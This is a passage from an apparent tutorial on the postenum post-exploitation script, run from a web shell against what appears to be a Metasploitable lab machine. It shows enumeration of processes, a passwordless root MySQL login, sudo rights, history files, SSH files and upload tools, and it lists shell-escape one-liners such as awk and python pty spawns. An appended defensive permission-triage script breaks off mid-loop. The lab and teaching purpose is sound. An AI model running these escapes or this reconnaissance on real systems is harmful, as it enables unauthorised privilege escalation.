www-data  4798  0.0  0.7   3400  1868 pts/1    Ss   13:31   0:00 /bin/bash
www-data  4927  0.0  0.7   3644  1888 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4956  0.0  0.4   3616  1204 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4957  0.0  0.3   2364   932 pts/1    R+   13:44   0:00 ps aux

[x] Process binaries and permissions:
692K -rwxr-xr-x 1 root root 686K Apr 14  2008 /bin/bash
 48K -rwxr-xr-x 1 root root  48K Apr  4  2008 /bin/dd
   0 lrwxrwxrwx 1 root root    4 Apr 28  2010 /bin/sh -> bash
 16K -rwxr-xr-x 1 root root  15K Apr 14  2008 /sbin/getty
 92K -rwxr-xr-x 1 root root  88K Apr 11  2008 /sbin/init
 24K -rwxr-xr-x 1 root root  23K Nov 23  2007 /sbin/klogd
 16K -rwxr-xr-x 1 root root  15K Dec  3  2007 /sbin/portmap
 40K -rwxr-xr-x 1 root root  39K Dec  2  2008 /sbin/rpc.statd
 32K -rwxr-xr-x 1 root root  32K Nov 23  2007 /sbin/syslogd
 72K -rwxr-xr-x 1 root root  67K Apr 11  2008 /sbin/udevd
 32K -rwxr-xr-x 1 root root  31K May 21  2007 /usr/bin/jsvc
   0 lrwxrwxrwx 1 root root   29 Apr 28  2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20  2012 /usr/bin/unrealircd
 28K -rwxr-xr-x 1 root root  28K Apr 18  2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21  2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar  9  2010 /usr/sbin/apache2
 16K -rwxr-xr-x 1 root root  16K Feb 20  2007 /usr/sbin/atd
 32K -rwxr-xr-x 1 root root  31K Apr  8  2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28  2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr  9  2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28  2010 /usr/sbin/nmbd
 36K -rwxr-xr-x 1 root root  35K Dec  2  2008 /usr/sbin/rpc.idmapd
 76K -rwxr-xr-x 1 root root  72K Dec  2  2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28  2010 /usr/sbin/smbd
368K -rwxr-xr-x 1 root root 363K Apr  6  2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec  3  2007 /usr/sbin/xinetd

[x] Display every process running by root on the system:
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash

[x] Is mysql running by root:
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
www-data  4969  0.0  0.2   1784   540 pts/1    R+   13:44   0:00 grep mysql

It will attempt to locate any cron jobs in the common directories, as well as any belonging to root. It will also give us the contents of the crontab, which is the list of regularly scheduled commands used by the administrator. Next, we can see the running services, including those running as root, and a check of whether the MySQL process is present and running as root.

Phase 4: Database Credentials

The next option we'll cover will try to connect to MySQL and log in — use the -t switch to do so:

target:/var/tmp$ ./postenum.sh -t

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 25 min 31 sec

Threads: 2  Questions: 446  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.291

We can see that it is able to connect to the database as root with no password. It then gives us some version information, connection data, and the uptime.

Phase 5: Development Tools & Shell Escapes

The next option we will cover will look for common development tools on the system, which can often be abused and lead to privilege escalation. It will also try some common shell escapes if restricted shells are present. Use the -l option for this:

target:/var/tmp$ ./postenum.sh -l

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] DEVELOPMENT TOOLS and LANGUAGES
[+] - Check for development tools and languages are installed/supported
/usr/bin/python
/usr/bin/perl
/usr/bin/php
/usr/bin/gcc
/usr/bin/cc
/usr/bin/nmap

[+] - Check for how files can be uploaded
/usr/bin/ftp
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/curl

[+] - Shell escape
awk    =        awk 'BEGIN {system("/bin/sh")}'
perl   =        perl -e 'exec "/bin/sh";'
python =        python -c 'import pty;pty.spawn("/bin/sh")'
php    =        php -r 'system("/bin/sh");'
ruby   =        ruby -e 'exec "/bin/sh"'
less   =        !sh
more   =        !sh
man    =        !sh
nmap   =        --interactive
nmap   =        echo "os.execute('/bin/sh')" > /tmp/shell.nse
find   =        find / -exec /usr/bin/awk 'BEGIN {system("/bin/sh")}' \;
find   =        find / -exec sh -i \;
vi     =        :!sh or :shell or -c '!sh'
vim    =        :!sh or :shell or -c '!sh'
gdb      =      shell

[+] - List all Environment Variables
SERVER_SIGNATURE=<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>

ORIG_PATH_TRANSLATED=/var/www/dvwa/vulnerabilities/exec/index.php
TERM=xterm
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
HTTP_HOST=10.10.0.50
SERVER_PORT=80
REDIRECT_HANDLER=php5-cgi
DOCUMENT_ROOT=/var/www/
SCRIPT_FILENAME=/var/www/dvwa/vulnerabilities/exec/index.php
REQUEST_URI=/dvwa/vulnerabilities/exec/
SCRIPT_NAME=/dvwa/vulnerabilities/exec/index.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=38016
PATH=/usr/local/bin:/usr/bin:/bin
ORIG_SCRIPT_FILENAME=/usr/lib/cgi-bin/php
SERVER_ADMIN=webmaster@localhost
PWD=/var/tmp
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5
HTTP_REFERER=http://10.10.0.50/dvwa/vulnerabilities/exec/
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_DNT=1
ORIG_SCRIPT_NAME=/cgi-bin/php
REMOTE_ADDR=10.10.0.1
SERVER_NAME=10.10.0.50
SHLVL=4
CONTENT_LENGTH=68
SERVER_SOFTWARE=Apache/2.2.8 (Ubuntu) DAV/2
QUERY_STRING=
SERVER_ADDR=10.10.0.50
GATEWAY_INTERFACE=CGI/1.1
HTTP_UPGRADE_INSECURE_REQUESTS=1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REDIRECT_URL=/dvwa/vulnerabilities/exec/index.php
HTTP_COOKIE=security=low; PHPSESSID=c7e9261b3015fccc2d7518ea95244d5e
REQUEST_METHOD=POST
ORIG_PATH_INFO=/dvwa/vulnerabilities/exec/index.php
_=/usr/bin/printenv

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

We can see that it finds some dev tools and languages, such as Python, PHP, and Nmap, among others. It also checks for tools that can be used to upload files, which could lead to further compromise. Then, it lists some shell escape commands, followed by environment variables and available shells on the system.

Phase 6: Software Versions

The next option we will look at will determine some version information from common software installed on the target. Use the -v switch to do so:

target:/var/tmp$ ./postenum.sh -v

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] SOFTWARES VERSION
[+] - Check apps and services version
[x] Sudo version (<= 1.8.20):
Sudo version 1.6.9p10

[x] MYSQL version:
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

[x] PostgreSQL version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

[x] Java version:
java version "1.5.0"
gij (GNU libgcj) version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)

Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

This gives us the software version numbers for Sudo, MySQL, PostgreSQL, and Java.

Phase 7: Interesting Files

The next option will attempt to locate any interesting files present on the system that could potentially be utilized for privilege escalation. Use the -c switch for this one:

target:/var/tmp$ ./postenum.sh -c

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] CONFIDENTIAL INFO and USER
[+] - Check list of users and super users
[x] Super user:
root:x:0:0:root:/root:/bin/bash
root

[x] Useful home users:
drwxr-xr-x 2 root     nogroup  4096 Mar 17  2010 /home/ftp
drwxr-xr-x 5 msfadmin msfadmin 4096 Jun 16  2018 /home/msfadmin
drwxr-xr-x 2 service  service  4096 Apr 16  2010 /home/service
drwxr-xr-x 3 user     user     4096 May  7  2010 /home/user

[x] Anything with /bin/bash /bin/sh /bin/dash:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash

[+] - Check /etc for config files (recursive 1 level)
[x] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr  9  2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov  6  2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26  2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13  2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr  4  2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20  2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16  2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11  2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20  2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16  2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20  2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16  2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 17  2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar  5  2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20  2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20  2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar  8  2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 41 Jul  5  2018 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18  2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28  2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16  2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27  2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28  2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23  2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21  2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec  2  2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23  2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16  2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May  4  2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20  2012 /etc/xinetd.conf

[x] Sudo permissions
[/] We can run sudo without supplying a password:
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[+] - Check sensitive files
-rw-r--r-- 1 root root 1581 May 13  2012 /etc/passwd
-rw-r----- 1 root shadow 1207 May 13  2012 /etc/shadow
-rw-r--r-- 1 root root 886 Apr 16  2010 /etc/group
-r--r----- 1 root root 470 Mar 16  2010 /etc/sudoers

[+] - Check if anything interesting in the mail directory
[x] Interesting mail in /var/mail:
-rw------- 1 msfadmin mail   0 Apr 28  2010 msfadmin
-rw------- 1 root     mail 722 May  7  2010 root

[x] Seems /var/mail/root exist - you can try to read it:
./postenum.sh: line 792: : command not found

[+] - Check if anything interesting in the home/root directories
[x] Check if /root is accessible:
[/] Root directory can be accessible
drwxr-xr-x 2 root root 4.0K May 20  2012 Desktop
-rwx------ 1 root root  401 May 20  2012 reset_logs.sh
-rw-r--r-- 1 root root  138 Jun 19 13:21 vnc.log

[x] Interesting /home/* directory:
drwxr-xr-x 2 root     nogroup  4.0K Mar 17  2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0K Jun  6  2018 msfadmin
drwxr-xr-x 2 service  service  4.0K Apr 16  2010 service
drwxr-xr-x 3 user     user     4.0K May  7  2010 user

[x] History files of /home/*/:
lrwxrwxrwx 1 root root 9 May 14  2012 /home/msfadmin/.bash_history -> /dev/null
-rw------- 1 root root 4.1K May 14  2012 /home/msfadmin/.mysql_history
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history

[x] History files of /root:
-rw-r--r-- 1 root root 173 Jun 18  2020 /root/.bash_history
-rw------- 1 root root 215 Jun 18 13:46 /root/.mysql_history

[+] - Check for plain text password
[x] ~/.bash_history - snippet below:
export TERM=xterm-256color
export SHELL=bash
stty rows 56 columns 213
ls
export TERM=xterm
ls
gfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ls
ls -la
cd /tmp/

~/.nano_history file doesn't exist:
~/.mysql_history file doesn't exist
~/.php_history file doesn't exist

[+] - Check SSH Dir/Files
[x] Any private-key info - /home/*/.ssh/:
drwx------ 2 msfadmin msfadmin 4096 May 17  2010 /home/msfadmin/.ssh

drwx------ 2 user user 4096 May  7  2010 /home/user/.ssh

[x] Any private-key info - /root/.ssh/:
drwxr-xr-x 2 root root 4096 May 20  2012 /root/.ssh/
ls: cannot open directory /home/user/.ssh: Permission denied
 [READABLE]

Check if PermitRootLogin is on:
[/] Root is allowed to login via SSH
yes

[+] - Check password policy information and Umask value
[x] Password Policy:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7

[x] Current umask value:
0022
u=rwx,g=rx,o=rx

[+] - Accessible .rhosts files
[x] Rhost config file(s):
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts

First, it gives us a list of superusers and users, followed by anything from /etc/passwd that has a shell. Next, it looks for various configuration files, sensitive files, and what the sudo permissions are like. It then checks for mail and any other interesting files in the home and root directories. Lastly, it gives us the Bash history, password policy information, and any private keys for SSH.
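Listings like the ones above are only useful once someone decides which lines matter. As an added example (not part of Postenum or this write-up), here is a small Python triage script that parses ls -l style lines such as those the -c and -s checks print, decodes the permission string, and ranks the findings a defender would fix first. The sample listing is constructed from the article's output; /opt/uploads is an invented path used to show a world-writable directory without the sticky bit.

```python
"""Triage ls -l style lines of the kind postenum prints for its -c and -s checks.

Added example for this write-up; it is not part of postenum. Given raw listing
lines, it decodes the permission string and ranks the findings a defender would
want to fix first: setuid/setgid binaries, world-writable paths (worse when a
directory has no sticky bit), private files readable by everyone, and legacy
.rhosts files.
"""
import re
import stat
from typing import List, NamedTuple

# Constructed sample: lines modelled on the article's output, plus an invented
# world-writable directory (/opt/uploads) and a symlink to show the edge cases.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
-rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwx 3 www-data www-data 4.0K Jun 19  2019 /opt/uploads
-rw-r--r-- 1 root root 173 Jun 19  2019 /root/.bash_history
-rwx------ 1 root root 4 May 20  2012 /root/.rhosts
-rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
lrwxrwxrwx 1 root root 9 May 14  2012 /home/msfadmin/.bash_history -> /dev/null
"""

_LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][-rwxsStT]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<path>\S.*)$"  # size, three date fields, path
)
_PRIVATE_PATH = re.compile(r"^/root/|/\.ssh(/|$)|_history$")
_SEVERITY_ORDER = {"HIGH": 0, "MED": 1, "LOW": 2}


class Entry(NamedTuple):
    mode: int      # st_mode-style permission bits
    is_dir: bool
    owner: str
    group: str
    path: str


class Finding(NamedTuple):
    severity: str
    kind: str
    path: str


def parse_mode(text: str) -> int:
    """Decode a 10-character ls mode string (e.g. '-rwsr-xr-x') into permission bits."""
    bits = 0
    for i, ch in enumerate(text[1:10]):
        shift = 6 - 3 * (i // 3)             # owner, group, other triplets
        if ch in "rwx":
            bits |= {"r": 4, "w": 2, "x": 1}[ch] << shift
        elif ch in "sS":                     # setuid in owner slot, setgid in group slot
            bits |= stat.S_ISUID if i < 3 else stat.S_ISGID
            bits |= (1 << shift) if ch == "s" else 0   # lowercase means x is also set
        elif ch in "tT":                     # sticky bit lives in the other-execute slot
            bits |= stat.S_ISVTX
            bits |= (1 << shift) if ch == "t" else 0
    return bits


def parse_listing(text: str) -> List[Entry]:
    """Parse ls -l lines; lines that are not listings (headers, errors) are skipped."""
    entries = []
    for line in text.splitlines():
        m = _LS_LINE.match(line.strip())
        if not m or m.group("mode")[0] == "l":
            continue                          # symlink modes are always rwxrwxrwx: ignore
        path = m.group("path").split(" -> ")[0]
        entries.append(Entry(parse_mode(m.group("mode")), m.group("mode")[0] == "d",
                             m.group("owner"), m.group("group"), path))
    return entries


def triage(entries: List[Entry]) -> List[Finding]:
    """Rank the permission findings, highest severity first."""
    findings = []
    for e in entries:
        if not e.is_dir and e.mode & stat.S_ISUID:
            findings.append(Finding("HIGH" if e.owner == "root" else "MED", "setuid", e.path))
        if not e.is_dir and e.mode & stat.S_ISGID:
            findings.append(Finding("MED", "setgid", e.path))
        if e.mode & stat.S_IWOTH:
            if e.is_dir:
                # The sticky bit stops users deleting each other's files; without it
                # anyone can replace anything in the directory.
                sev = "LOW" if e.mode & stat.S_ISVTX else "HIGH"
                findings.append(Finding(sev, "world-writable dir", e.path))
            else:
                findings.append(Finding("HIGH", "world-writable file", e.path))
        if e.mode & stat.S_IROTH and _PRIVATE_PATH.search(e.path):
            findings.append(Finding("MED", "world-readable private file", e.path))
        if e.path.endswith("/.rhosts"):
            findings.append(Finding("MED", "legacy .rhosts present", e.path))
    return sorted(findings, key=lambda f: _SEVERITY_ORDER[f.severity])


if __name__ == "__main__":
    for f in triage(parse_listing(SAMPLE_LISTING)):
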